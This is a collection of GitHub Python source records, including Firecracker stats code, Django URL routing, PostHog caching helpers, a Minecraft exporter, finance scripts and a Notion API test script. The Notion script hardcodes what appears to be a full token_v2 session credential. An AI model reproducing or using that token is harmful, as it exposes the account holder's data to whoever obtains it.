{"seq_id":"22342589938","text":"import types\nfrom collections import defaultdict, namedtuple\nfrom datetime import datetime\nfrom typing import TypedDict\n\nfrom framework.utils import ExceptionAggregator\n\nfrom .consumer import Consumer, ProcessingException\nfrom .producer import Producer\n\n\nclass CoreException(ExceptionAggregator):\n    \"\"\"Exception used to return core messages.\n\n    The caller should handle the exception accordingly.\n    \"\"\"\n\n    def __init__(self, result=None):\n        \"\"\"Initialize the exception.\"\"\"\n        super().__init__()\n        self.result = result\n\n\nclass Result(TypedDict):\n    \"\"\"Data class for aggregated statistic results.\"\"\"\n\n    name: str\n    iterations: int\n    results: dict\n    custom: dict\n\n\nPipe = namedtuple(\"Pipe\", \"producer consumer\")\n\n\nclass Core:\n    \"\"\"Base class for statistics core driver.\"\"\"\n\n    # pylint: disable=W0102\n    def __init__(self, name=\"\", iterations=1, custom={}):\n        \"\"\"Core constructor.\"\"\"\n        self._pipes = defaultdict(Pipe)\n        self._result = Result(\n            name=name, iterations=iterations, results={}, custom=custom\n        )\n        self._failure_aggregator = CoreException()\n        self.metrics_test = None\n        self.metrics = None\n        self.check_baseline = True\n\n    def add_pipe(self, producer: Producer, consumer: Consumer, tag=None):\n        \"\"\"Add a new producer-consumer pipe.\"\"\"\n        if tag is None:\n            tag = self._result[\"name\"] + \"_\" + str(datetime.timestamp(datetime.now()))\n        self._pipes[tag] = Pipe(producer, consumer)\n\n    def run_exercise(self, fail_fast=False) -> Result:\n        \"\"\"Drive the statistics producers until completion.\"\"\"\n        iterations = self._result[\"iterations\"]\n\n        for tag, pipe in self._pipes.items():\n            for iteration in range(iterations):\n                raw_data = pipe.producer.produce()\n                if not isinstance(raw_data, types.GeneratorType):\n                    raw_data = [raw_data]\n                for data in raw_data:\n                    raws = pipe.consumer.ingest(iteration, data)\n                    if raws is not None:\n                        dimensions = 
self.custom.copy()\n test = tag.split(\"/\")[-1]\n dimensions[\"test\"] = test\n dimensions[\"performance_test\"] = self.name\n self.metrics.set_dimensions(dimensions)\n for name, val, unit in raws:\n self.metrics.put_metric(name, val, unit)\n self.metrics.set_property(\"iteration\", iteration)\n self.metrics.flush()\n\n try:\n stats, custom = pipe.consumer.process(check=self.check_baseline)\n except (ProcessingException, AssertionError) as err:\n self._failure_aggregator.add_row(f\"Failed on '{tag}':\")\n self._failure_aggregator.add_row(err)\n stats = err.stats\n custom = err.custom\n if fail_fast:\n raise self._failure_aggregator\n\n self._result[\"results\"][tag] = stats\n\n # Custom information extracted from all the iterations.\n if len(custom) > 0:\n self._result[\"custom\"][tag] = custom\n\n self.raise_if_regression()\n return self._result\n\n def raise_if_regression(self):\n \"\"\"Raise an exception if there was an issue or a regression was\n detected.\n \"\"\"\n if self._failure_aggregator.has_any():\n self._failure_aggregator.result = self._result\n # If we had Python 3.11 we could use ExceptionGroup\n raise self._failure_aggregator\n\n @property\n def name(self):\n \"\"\"Return statistics name.\"\"\"\n return self._result[\"name\"]\n\n @name.setter\n def name(self, name):\n \"\"\"Set statistics name.\"\"\"\n self._result[\"name\"] = name\n\n @property\n def iterations(self):\n \"\"\"Return statistics iterations count.\"\"\"\n return self._result[\"iterations\"]\n\n @iterations.setter\n def iterations(self, iterations):\n \"\"\"Set statistics iterations count.\"\"\"\n self._result[\"iterations\"] = iterations\n\n @property\n def custom(self):\n \"\"\"Return statistics custom information.\"\"\"\n return self._result[\"custom\"]\n\n @custom.setter\n def custom(self, custom):\n \"\"\"Set statistics custom information.\"\"\"\n self._result[\"custom\"] = custom\n\n @property\n def statistics(self):\n \"\"\"Return statistics gathered so far.\"\"\"\n return self._result\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/framework/stats/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"70745237929","text":"from django.conf.urls import url, include\nfrom . 
import views\n\nurlpatterns = [ \n    url(r'^about/', views.about, name='about'),\n    url(r'^sitemap/', views.sitemap, name='sitemap'),\n    url(r'^contact/', views.contact, name='contact'),\n    url(r'^list_all_posts/', views.list_all_posts, name='list_all_posts'),\n    url(r'^$',views.blog, name='blog'),\n    url(r'^(?P<slug>[^/]+)/$', views.readblog, name='readblog'),\n    ]","repo_name":"iamvarunsekhar/Personal-Blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35300540407","text":"from notion.client import NotionClient\n\n\nclient = NotionClient(token_v2=\"39ef1ddd36f6d1df766f496a75449093fadf1aa6c4c1e3442602754bc82c918a032bc025d4c5956801b58bc88fe10d950b6e844fa24b1951a095c3dde43a37ca7a509f77169389a97a70dc74baf5\")\n\nurl = 'https://www.notion.so/API-TEST-c6b9d18ec0f444928982c7c387c6013a'\n\npage = client.get_block(url)\n\n\n# Read page title\npage.title\n\n# Set page title\npage.title = \"API test commit\"\n\n# Blocks\npage.children\n\nfor child in page.children:\n    print(child.title)\n\n\n# DATABASES\n\nurl_db = 'https://www.notion.so/3457774311c54092b2dc4e0693e638bd?v=430b979a9640427185c9f9a3460b2fdf'\n\n# Access a database using the URL of the database page or the inline block\ncv = client.get_collection_view(url_db)\n\ncv.collection.get_rows()\n\n# List all the records with \"Bob\" in them\nfor row in cv.collection.get_rows(search=\"Oppgave\"):\n    print(\"We estimate the value of '{}' at {}\".format(row.name, row.estimated_value))\n\n\n\n\n# Add a new record\nrow = cv.collection.add_row()\nrow.name = 'Oppgave 6'","repo_name":"marcus-gt/todoist-to-notion","sub_path":"notion-committer.py","file_name":"notion-committer.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7023645122","text":"import json\nimport sys, getopt, os\nimport datetime\nsys.path.append(r'../')\nsys.path.append(os.path.abspath('./efinance'))\n\nfrom ultility.common_def import *\nfrom ultility.common_func import *\n\nfrom ultility.stock_codes_utility import stock_codes_utility as SCU\nfrom data_set.finance_data.data_download import data_download\nfrom data_set.finance_data.finance_factor_calc import *\nfrom data_set.finance_data.finance_factor_rank import *\nfrom data_set.process_data.process_daily_trade import process_daily_trade\nfrom data_set.process_data.process_detailed_trade import *\n\ndef finance_factor_process(conf):\n    \n    common_conf = conf['common']\n    folder = common_conf[\"folder\"]\n    path = common_conf['path']\n    path_stock = os.path.join(path, folder['data_stock'])\n    path_rank = os.path.join(path, folder[\"finance_rank\"])\n\n    finance_conf = conf['finance']\n    result_name = finance_conf['result_name']\n    dates = finance_conf['dates']\n    factors = finance_conf['factors']\n\n    scu = SCU(path, CONST_DEF.TYPE_STOCK)\n    # stock_codes = scu.stock_codes()\n    stock_codes = scu.stock_codes_from_table()\n    print(stock_codes)\n    # stock_codes = ['600032']\n\n    # process quarter trade\n    daily_trade_data = process_daily_trade(path, path_stock, path_stock)\n    daily_trade_data.trade_data_quarter(stock_codes)\n\n    # need to disable following code when debug\n    stock_codes = scu.skip_stock_codes(stock_codes)\n\n    # factors calculate\n    ffc = finance_factor_calc(path, path_stock, path_stock)\n    ffc.stock_factors_calc(stock_codes)\n\n    # rank the factor\n    finance_factors_rank(path_stock, path_rank, result_name, 
stock_codes, dates, factors)\n\ndef daily_stock_trade_process(path, folder_in, folder_out, trade_ouput_file, codes_names):\n path_in = os.path.join(path, folder_in)\n path_out = os.path.join(path, folder_out)\n # stock_codes = ['002830']\n # need to disable following code when debug\n # stock_codes = scu.skip_stock_codes(stock_codes)\n #process daily trade data\n daily_trade_data = process_daily_trade(path, path_in, path_out)\n daily_trade_data.index_price_volume_ratio(codes_names, trade_ouput_file)\n\ndef detailed_trade_process(path, folder_in, folder_out, data_type):\n\n path_in = os.path.join(path, folder_in)\n path_out = os.path.join(path, folder_out)\n scu = SCU(path, data_type)\n stock_codes = scu.stock_codes_from_table()\n # stock_codes = ['000001']\n # stock_codes = ['002830']\n\n detailed_trade_process = detailed_trade(path, path_in, path_out)\n detailed_trade_process.statistic_detailed_bills(stock_codes)\n\ndef daily_trade_process(conf):\n\n common_conf = conf['common']\n folder = common_conf[\"folder\"]\n path = common_conf['path']\n trade_conf = conf['trade']\n\n finance_163_daily_trade_factor = trade_conf['finance_163_daily_trade_factor']\n stock_163_daily_trade_factor = trade_conf['stock_163_daily_trade_factor']\n stock_163_detailed_trade_factor = trade_conf['stock_163_detailed_trade_factor']\n index_163_daily_trade_factor = trade_conf['index_163_daily_trade_factor']\n block_daily_trade_factor = trade_conf['block_daily_trade_factor']\n\n if finance_163_daily_trade_factor == 'yes':\n finance_factor_process(conf)\n\n if stock_163_daily_trade_factor == 'yes':\n scu = SCU(path, CONST_DEF.TYPE_STOCK)\n codes_names = scu.stock_codes_names_from_table()\n daily_stock_trade_process(path, folder['data_stock'], folder['process_trade'], trade_conf['stock_trade_ratio_file'], codes_names)\n\n if block_daily_trade_factor == 'yes':\n scu = SCU(path, CONST_DEF.TYPE_INDEX)\n codes_names = scu.block_codes_names_from_eastmoney('indurstry')\n daily_stock_trade_process(path, folder['data_index'], folder['process_trade'], trade_conf['block_trade_ratio_file'], codes_names)\n\n if stock_163_detailed_trade_factor == \"yes\":\n folder_in = folder['data_detailed_stock']\n folder_out = folder['data_stock']\n detailed_trade_process(path, folder_in, folder_out, CONST_DEF.TYPE_DETAILED_STOCK)\n\n\nif __name__ == '__main__':\n\n # default configure file name\n filename = './conf/conf.json'\n # default finance analysis\n trade_flag = False \n # tradeflag = True \n try:\n opts, args = getopt.getopt(sys.argv[1:], \"f:p:t:\", [\"filename=\", \"path=\", \"tradeflag=\"])\n except getopt.GetoptError:\n print('test.py -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('python3 finance_stock_basic_proc.py -f conf.json')\n elif opt in (\"-f\", \"--filename\"):\n filename = arg\n elif opt in (\"-t\", \"--tradeflag\"):\n trade_flag = True \n\n conf = common_func.read_config(filename)\n\n daily_trade_process(conf)\n\n","repo_name":"luozero/finance_quant","sub_path":"factors_calc.py","file_name":"factors_calc.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"39510430799","text":"from datetime import datetime, timedelta\nfrom math import ceil\nfrom time import sleep\nfrom typing import Optional, Tuple, Union\nimport zoneinfo\nfrom rest_framework import request\n\nfrom posthog.caching.calculate_results import (\n CLICKHOUSE_MAX_EXECUTION_TIME,\n calculate_cache_key,\n)\nfrom 
posthog.caching.insight_caching_state import InsightCachingState\nfrom posthog.models import DashboardTile, Insight\nfrom posthog.models.filters.utils import get_filter\nfrom posthog.utils import refresh_requested_by_client\n\n\"\"\"\nUtilities used by the insights API to determine whether\nor not to refresh an insight upon a client request to do so\n\"\"\"\n\n# Default minimum wait time for refreshing an insight\nBASE_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=15)\n# Wait time for short-term insights\nREDUCED_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=3)\n# Wait time for insights on shared insight/dashboard pages\nINCREASED_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=30)\n\n\ndef should_refresh_insight(\n    insight: Insight,\n    dashboard_tile: Optional[DashboardTile],\n    *,\n    request: request.Request,\n    is_shared=False,\n) -> Tuple[bool, timedelta]:\n    \"\"\"Return whether the insight should be refreshed now, and what's the minimum wait time between refreshes.\n\n    If a refresh already is being processed somewhere else, this function will wait for that to finish (or time out).\n    \"\"\"\n    filter = get_filter(\n        data=insight.dashboard_filters(dashboard_tile.dashboard if dashboard_tile is not None else None),\n        team=insight.team,\n    )\n\n    delta_days: Optional[int] = None\n    if filter.date_from and filter.date_to:\n        delta = filter.date_to - filter.date_from\n        delta_days = ceil(delta.total_seconds() / timedelta(days=1).total_seconds())\n\n    refresh_frequency = BASE_MINIMUM_INSIGHT_REFRESH_INTERVAL\n    if is_shared:\n        # The interval is longer for shared insights/dashboards\n        refresh_frequency = INCREASED_MINIMUM_INSIGHT_REFRESH_INTERVAL\n    elif getattr(filter, \"interval\", None) == \"hour\" or (delta_days is not None and delta_days <= 7):\n        # The interval is shorter for short-term insights\n        refresh_frequency = REDUCED_MINIMUM_INSIGHT_REFRESH_INTERVAL\n\n    refresh_insight_now = False\n    if refresh_requested_by_client(request):\n        now = datetime.now(tz=zoneinfo.ZoneInfo(\"UTC\"))\n        target: Union[Insight, DashboardTile] = insight if dashboard_tile is None else dashboard_tile\n        cache_key = calculate_cache_key(target)\n        # Most recently queued caching state\n        caching_state = (\n            InsightCachingState.objects.filter(team_id=insight.team.pk, cache_key=cache_key, insight=insight)\n            .order_by(\"-last_refresh_queued_at\")\n            .first()\n        )\n        refresh_insight_now = (\n            caching_state is None\n            or caching_state.last_refresh is None\n            or (caching_state.last_refresh + refresh_frequency <= now)\n        )\n\n        if refresh_insight_now:\n            has_refreshed_somewhere_else = _sleep_if_refresh_is_running_somewhere_else(caching_state, now)\n            if has_refreshed_somewhere_else:\n                refresh_insight_now = False\n\n    return refresh_insight_now, refresh_frequency\n\n\ndef _sleep_if_refresh_is_running_somewhere_else(caching_state: Optional[InsightCachingState], now: datetime) -> bool:\n    \"\"\"Prevent the same query from running concurrently needlessly.\"\"\"\n    is_refresh_currently_running = _is_refresh_currently_running_somewhere_else(caching_state, now)\n    if is_refresh_currently_running:\n        assert caching_state is not None # Isn't None due to condition in _is_refresh_currently_running_somewhere_else\n        while is_refresh_currently_running:\n            sleep(1)\n            caching_state.refresh_from_db()\n            has_refresh_completed = (\n                caching_state.last_refresh is not None\n                and caching_state.last_refresh >= caching_state.last_refresh_queued_at\n            )\n            if has_refresh_completed:\n                return True # Refresh has completed while being initiated from somewhere 
else!\n is_refresh_currently_running = _is_refresh_currently_running_somewhere_else(\n caching_state, datetime.now(tz=zoneinfo.ZoneInfo(\"UTC\"))\n )\n return False\n\n\ndef _is_refresh_currently_running_somewhere_else(caching_state: Optional[InsightCachingState], now: datetime) -> bool:\n \"\"\"Return whether the refresh is most likely still running somewhere else.\"\"\"\n if (\n caching_state is not None\n # A refresh must have been queued at some point in the past\n and caching_state.last_refresh_queued_at is not None\n # That point was recent enough that the query might still be running\n and caching_state.last_refresh_queued_at > now - timedelta(seconds=CLICKHOUSE_MAX_EXECUTION_TIME)\n # And refreshing must have either never finished or last finished before it was queued now\n and (caching_state.last_refresh is None or caching_state.last_refresh < caching_state.last_refresh_queued_at)\n ):\n return True\n else:\n # Otherwise we're sure the refresh isn't running at the moment - either it's not been queued or it's timed out\n # (barring the occasional race condition related to fetching state from PG, but that much uncertainty is okay)\n return False\n","repo_name":"PostHog/posthog","sub_path":"posthog/caching/insights_api.py","file_name":"insights_api.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"24350443593","text":"import logging\nimport os\n\nfrom main import CACHE_DIR, EXPORT_INTERVAL_SECONDS\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_player_count(server):\n try:\n server_status = server.status()\n return server_status.players.online\n except Exception as e:\n logger.exception(e)\n return 0\n\n\ndef get_online_players(server):\n try:\n return server.query().players.names\n except Exception as e:\n logger.exception(e)\n return []\n\n\ndef get_server_latency(server):\n try:\n server_status = server.status()\n return server_status.latency\n except Exception as e:\n logger.exception(e)\n return 0\n\n\ndef create_player_file(player_name):\n player_file_path = CACHE_DIR + player_name\n\n logger.info(\"File \" + player_file_path + \" does not exists, creating now\")\n\n f = open(player_file_path, \"a\")\n f.write(str(0))\n f.close()\n\n\ndef read_player_minutes(player_name):\n player_file_path = CACHE_DIR + player_name\n\n f = open(player_file_path, \"r\")\n player_minutes = f.read()\n f.close()\n\n return player_minutes\n\n\ndef add_player_minutes(player_name):\n player_file_path = CACHE_DIR + player_name\n\n if not os.path.isfile(player_file_path):\n create_player_file(player_name)\n\n player_minutes = read_player_minutes(player_name)\n\n logger.info(\"player minutes: \" + player_minutes)\n logger.info(\"Adding \" + str(EXPORT_INTERVAL_SECONDS / 60) + \" minute(s) to playertime to \" + player_name)\n\n f = open(CACHE_DIR + player_name, \"w\")\n f.write(str(float(player_minutes) + EXPORT_INTERVAL_SECONDS / 60))\n f.close()\n","repo_name":"kaiffeetasse/minecraft-exporter","sub_path":"minecraft_service.py","file_name":"minecraft_service.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13054899461","text":"\"\"\"housesauna URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\n\nfrom rest_framework import routers\n\nfrom api.views import RealtyApiView, StructuresApiView\nfrom . import views\n\nhandler404 = views.handler404\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('saunaman/', admin.site.urls),\n path('', views.IndexView.as_view(), name='index'),\n path('', include(router.urls)),\n path(\n 'api/v1/structures/',\n StructuresApiView.as_view(),\n name='get_structures'\n ),\n path(\n 'api/v1/realty/',\n RealtyApiView.as_view(),\n name='get_realty'\n ),\n path('not-found/', views.notfound, name='notfound'),\n path('about/', views.about, name='about'),\n path('design/', views.design, name='design'),\n path('policy/', views.policy, name='policy'),\n path('production/', views.production, name='production'),\n path(\n 'projects/',\n include(('houses.urls', 'houses'), namespace='houses')\n ),\n path('submit/', views.submit_form, name='submit'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","repo_name":"letulip/housesauna","sub_path":"housesauna/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1672689052","text":"import matplotlib.pyplot as plt\nimport psycopg2\n\n\ndef polygon_to_points(polygon_string):\n xs = []\n ys = []\n points = polygon_string[9:-2].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\ndef point_to_points(point_string):\n xs = []\n ys = []\n points = point_string[6:-1].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\ndef linestring_to_points(line_string):\n xs = []\n ys = []\n points = line_string[11:-2].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\nscale = 1/30000\nconn = psycopg2.connect(\"dbname='trab' user='arcaic' host='localhost' password='password'\")\ncursor_psql = conn.cursor()\n\nsql = \"select st_astext(st_envelope(st_collect(st_simplify(proj_boundary, 100, FALSE)))) from cont_aad_caop2018 where concelho='PORTO'\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nrow = results[0]\npolygon_string = row[0]\nxs, ys = polygon_to_points(polygon_string)\nwidth_in_inches = ((max(xs)-min(xs))/0.0254)*1.1\nheight_in_inches = ((max(ys)-min(ys))/0.0254)*1.1\nfig = plt.figure(figsize=(width_in_inches*scale,height_in_inches*scale))\n\n\nsql = \"select st_astext(st_simplify(proj_boundary,10,False)) from cont_aad_caop2018 where concelho in ('PORTO');\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nfor row in results:\n polygon_string = row[0]\n xs, ys = polygon_to_points(polygon_string)\n plt.plot(xs,ys, 
color='black')\n\nxs = []\nys = []\n\nsql = \"select name, count(tracks.id), st_astext(proj_location) from tracks , taxi_stands where st_dwithin(proj_location, st_startpoint(proj_track), 50) group by name, proj_location;\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nval = []\nfor row in results:\n val.append(row[1])\n point_string = row[2]\n x, y = point_to_points(point_string)\n xs.append(float(x[0]))\n ys.append(float(y[0]))\nplt.scatter(xs, ys, s=val, c=val, cmap='jet')\nplt.colorbar()\n\nplt.title('Tracks initiated in taxi stands ', fontdict={'fontsize': 22})\n\nplt.show()","repo_name":"jpsmonteiro98/Faculdade","sub_path":"TABD/Stands.py","file_name":"Stands.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39512736129","text":"import json\nfrom typing import TYPE_CHECKING, Optional\n\nfrom django.core.cache import cache\nfrom sentry_sdk import capture_exception\n\nif TYPE_CHECKING:\n from posthog.models.team import Team\n\nFIVE_DAYS = 60 * 60 * 24 * 5 # 5 days in seconds\n\n\ndef set_team_in_cache(token: str, team: Optional[\"Team\"] = None) -> None:\n from posthog.api.team import CachingTeamSerializer\n from posthog.models.team import Team\n\n if not team:\n try:\n team = Team.objects.get(api_token=token)\n except (Team.DoesNotExist, Team.MultipleObjectsReturned):\n cache.delete(f\"team_token:{token}\")\n return\n\n serialized_team = CachingTeamSerializer(team).data\n\n cache.set(f\"team_token:{token}\", json.dumps(serialized_team), FIVE_DAYS)\n\n\ndef get_team_in_cache(token: str) -> Optional[\"Team\"]:\n from posthog.models.team import Team\n\n try:\n team_data = cache.get(f\"team_token:{token}\")\n except Exception:\n # redis is unavailable\n return None\n\n if team_data:\n try:\n parsed_data = json.loads(team_data)\n return Team(**parsed_data)\n except Exception as e:\n capture_exception(e)\n return None\n\n return None\n","repo_name":"PostHog/posthog","sub_path":"posthog/models/team/team_caching.py","file_name":"team_caching.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"3259256385","text":"\"\"\"\nArgument management module.\n\"\"\"\n\nimport logging\n\nfrom colorlog import ColoredFormatter\n\nfrom . 
import __version__\n\n\nlog = logging.getLogger(__name__)\n\n\nclass InvalidArgument(Exception):\n    \"\"\"\n    Custom exception to raise when a command line argument or combination of\n    arguments are invalid.\n    \"\"\"\n\n\ndef validate_args(args):\n    \"\"\"\n    Validate that arguments are valid.\n\n    :param args: An arguments namespace.\n    :type args: :py:class:`argparse.Namespace`\n\n    :return: The validated namespace.\n    :rtype: :py:class:`argparse.Namespace`\n    \"\"\"\n\n    logfrmt = (\n        ' {thin_white}{asctime}{reset} | '\n        '{log_color}{levelname:8}{reset} | '\n        '{message}'\n    )\n\n    verbosity_levels = {\n        0: logging.ERROR,\n        1: logging.WARNING,\n        2: logging.INFO,\n        3: logging.DEBUG,\n    }\n\n    stream = logging.StreamHandler()\n    stream.setFormatter(ColoredFormatter(fmt=logfrmt, style='{'))\n\n    level = verbosity_levels.get(args.verbosity, logging.DEBUG)\n    logging.basicConfig(handlers=[stream], level=level)\n\n    log.debug('Raw arguments:\\n{}'.format(args))\n\n    return args\n\n\ndef parse_args(argv=None):\n    \"\"\"\n    Argument parsing routine.\n\n    :param list argv: A list of argument strings.\n\n    :return: A parsed and verified arguments namespace.\n    :rtype: :py:class:`argparse.Namespace`\n    \"\"\"\n    from argparse import ArgumentParser\n\n    parser = ArgumentParser(\n        description='Python GTK Kiosk'\n    )\n    parser.add_argument(\n        '-v', '--verbose',\n        help='increase verbosity level',\n        default=0,\n        action='count',\n        dest='verbosity',\n    )\n    parser.add_argument(\n        '--version',\n        action='version',\n        version='{} {}'.format(parser.description, __version__)\n    )\n    parser.add_argument(\n        '-k', '--kiosk',\n        help='Enable kiosk mode',\n        action='store_true',\n    )\n\n    args = parser.parse_args(argv)\n    args = validate_args(args)\n    return args\n\n\n__all__ = [\n    'parse_args',\n]\n","repo_name":"kuralabs/python-gtk-kiosk","sub_path":"python_gtk_kiosk/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32316910872","text":"from modules.automatic.myWebDriver import MyWebDriver\nfrom tkinter import *\nfrom tkinter import ttk\nimport sys\n\nclass MyGui:\n    def __init__(self, version, currentDir, downloadDir=None):\n        self.__currentDir = currentDir\n        self.__downloadDir = downloadDir\n        self.__version = version\n\n    # Invoke the method named by the argument as a callback\n    def handler(self, funcName):\n        objMyWebDriver = MyWebDriver(0, self.__currentDir, self.__downloadDir)\n        eval('objMyWebDriver.' 
+ funcName)()\n        objMyWebDriver.quit()\n\n    def getShipmentInfo(self):\n        self.handler(sys._getframe().f_code.co_name)\n\n    def setShipmentNo(self):\n        self.handler(sys._getframe().f_code.co_name)\n\n    def run(self):\n        # Create the Tk object\n        root = Tk()\n        # Window title\n        root.title(\"RPA ver:\" + self.__version)\n        # Set the window size\n        root.geometry(\"300x200+0+0\")\n        # Create the widgets\n        #frame1 = ttk.Frame(root)\n        Static1 = ttk.Label(\n            #frame1, \n            text='実行したいRPA処理をクリックして下さい')\n        button1 = ttk.Button(\n            #frame1,\n            text='出荷情報抽出', \n            command=self.getShipmentInfo,\n            width=20, \n            padding=5)\n        button2 = ttk.Button(\n            #frame1,\n            text='運送伝票番号登録', \n            command=self.setShipmentNo,\n            width=20, \n            padding=5)\n\n        # Layout\n        #frame1.pack()\n        Static1.pack(side = TOP, pady = (10, 0))\n        button1.pack(side = TOP, pady = (10, 0))\n        button2.pack(side = TOP, pady = 10)\n\n        root.mainloop() # event loop","repo_name":"tk2112/mainsys_automatic","sub_path":"modules/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14517199709","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn.learning_curve as curves\nfrom sklearn.cross_validation import ShuffleSplit\nfrom sklearn.metrics import precision_score, accuracy_score, recall_score, f1_score, roc_auc_score\nfrom sklearn.metrics import precision_recall_curve, roc_curve\nfrom sklearn.metrics import confusion_matrix\n\n\ndef standard_confusion_matrix(y_true, y_predict):\n    [[tn, fp], [fn, tp]] = confusion_matrix(y_true, y_predict)\n    return np.array([[tp, fp], [fn, tn]])\n\n\ndef profit_curve(cost_benefit_matrix, probabilities, y_true):\n    thresholds = sorted(probabilities, reverse=True)\n    profits = []\n    for threshold in thresholds:\n        y_predict = probabilities > threshold\n        confusion_mat = standard_confusion_matrix(y_true, y_predict)\n        profit = np.sum(confusion_mat * cost_benefit_matrix) / float(len(y_true))\n        profits.append(profit)\n    return thresholds, profits\n\n\ndef run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test):\n    probabilities = model.predict_proba(X_test)[:, 1]\n    thresholds, profits = profit_curve(costbenefit, probabilities, y_test)\n    return thresholds, profits\n\n\ndef plot_profit_model(model, costbenefit, X_train, X_test, y_train, y_test):\n    percentages = np.linspace(0, 100, len(y_test))\n    thresholds, profits = run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test)\n    plt.plot(percentages, profits, label=model.__class__.__name__)\n    plt.title(\"Profit Curve\")\n    plt.xlabel(\"Percentage of test instances (decreasing by score)\")\n    plt.ylabel(\"Profit\")\n    plt.legend(loc='best')\n    plt.savefig('profit_curve.png')\n\n\ndef find_best_threshold(model, costbenefit, X_train, X_test, y_train, y_test):\n    max_threshold = None\n    max_profit = float('-inf') # comparing against None would raise a TypeError in Python 3\n\n    thresholds, profits = run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test)\n    max_index = np.argmax(profits)\n    if profits[max_index] > max_profit:\n        max_threshold = thresholds[max_index]\n        max_profit = profits[max_index]\n    return max_threshold, max_profit\n","repo_name":"pengmiao2014/Uber_Rider_Data","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72303784807","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 19 09:27:40 2021\n\n@author: akhilesh.koul\n\"\"\"\n\nimport geopandas as gpd\nimport pandas as pd\nimport 
matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"..\")\nimport seaborn as sns\nsns.set_theme()\nimport requests\nfrom shapely.geometry import Point\nfrom shapely.ops import cascaded_union\nfrom shapely.ops import unary_union\nfrom geovoronoi.plotting import plot_voronoi_polys_with_points_in_area\nfrom geovoronoi import voronoi_regions_from_coords, points_to_coords\nfrom data.db_description import getDatabase\n\n\n\n\nclass imvoronoit():\n \n def __init__(self,chain='MCD',notebook=True):\n \n \n \n region_db,chainDB=getDatabase()\n # print(region_db)\n self.regionDB=next(item for item in region_db if item['Name'] == 'MASTER_PLAN') \n \n attrDB=next(item_ for item_ in chainDB if item_['Name'] == chain)\n # print(attrDB)\n \n if notebook== False:\n \n self.shape_path='../'\n self.image_path='../'+attrDB['logoFile']\n \n if notebook== True:\n \n self.shape_path='' \n self.image_path=attrDB['logoFile']\n \n self.chain=chain \n self.getBoundary()\n self.getShape(chain)\n \n def getBoundary(self,plot=False): \n \n region = gpd.read_file(self.shape_path + self.regionDB['shapeFile'])\n polygons=[region.iloc[0][\"geometry\"],\n region.iloc[1][\"geometry\"],\n region.iloc[2][\"geometry\"],\n region.iloc[3][\"geometry\"],\n region.iloc[4][\"geometry\"]]\n\n union_poly = unary_union(polygons)\n 